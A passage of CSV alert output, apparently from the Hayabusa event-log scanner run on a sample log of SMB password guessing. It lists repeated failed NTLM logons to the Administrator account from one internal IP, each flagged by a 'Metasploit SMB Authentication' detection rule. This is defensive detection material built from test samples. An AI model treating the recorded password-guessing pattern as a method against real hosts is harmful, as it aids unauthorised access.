Password,User: Administrator : Type: 3 : Workstation: SfnBT5OvT5cQXHfS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.308 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLZFPCShXoPvvThS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UsPCJ0UlfH4urYrm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.388 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIQlOetFByLZqPkT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.424 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9IBZ0qTDlHWADZt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.456 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lmhkB39gKvvuT89e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4KPoZ8JB7WSjUCHW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0mwiPq4gF1YXkQSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y5ncgrpwOFo7E8vg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.615 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KbkG8ezrAPFC0iKu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.647 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: GW4WKkHocNadDzrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: unbtFAiykcfKTbQT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oRzF1s9XVoRmoFQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9TO1c7eYd1IQHVwG : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.813 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wsn5GM4BqEl6A6pY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pq350wqwVDQlTKu9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uMJWwjG7J2sOiBYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3YusfxQQygi2x5Cu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:01.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q29uj6ovfwz0riC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.024 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cj38VsqGLoQ8jGdf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TOW8OIO2vQRFaTID : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfYITdZCYwEj9IJV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.173 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4BI6V35tZGZ1WGtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wOF75n4aunKH9qxc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jsTFTCnFFBkhG5jP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qiwcKE2TQui2H8z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.328 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PZOCyXplWOCyKbFm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RhyaAhYB78nbh1Ig : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MIJU9xbr1klIvvdE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qLKVR3mW3g3utO4X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.506 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: aNm4tVG8bV7e9gbB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JtU0PCr9K5DXFYV2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CH3BWNPEWlw52Gb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.622 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vQTYqFKBz6YEWhF6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qkj3u8ODgLD7xQ5R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9uyze1uO0zuNNUM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.758 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmL15i3edXHcUamI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.803 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x7xjFRjv9rDhiXJ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6BmQhVEv8g7EKu1F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOMmG87cDO1NFg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tO55KfkORhxFORvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:02.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D64wDbqkqmzWuUSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sIDgNIlGA0cOkBOI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i0kXPQ6s7CGe4QGA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.082 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HW5jP389jmqSkzF1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enhsof25BdDPcI2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.186 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4acsPMLUJRrT7mmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:03.228 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
